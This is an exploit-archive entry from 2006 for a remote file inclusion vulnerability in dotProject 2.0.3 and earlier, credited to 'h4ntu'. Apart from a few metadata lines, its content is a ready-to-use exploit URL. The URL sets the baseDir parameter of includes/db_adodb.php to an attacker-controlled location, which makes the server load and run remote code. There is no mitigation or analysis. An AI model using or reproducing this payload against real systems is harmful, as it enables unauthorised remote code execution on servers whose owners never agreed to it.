dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability

2006-06-20T00:00:00
ID 1337DAY-ID-534
Type zdt
Reporter h4ntu
Modified 2006-06-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability
=================================================================



Credits : h4ntu

Title : dotProject <= 2.0.3 Remote File Inclusion

URL : http://www.dotproject.net/


Exploit : http://target.com/[dotProject_path]/includes/db_adodb.php?baseDir=[attacker] 



#  0day.today [2018-01-10]  #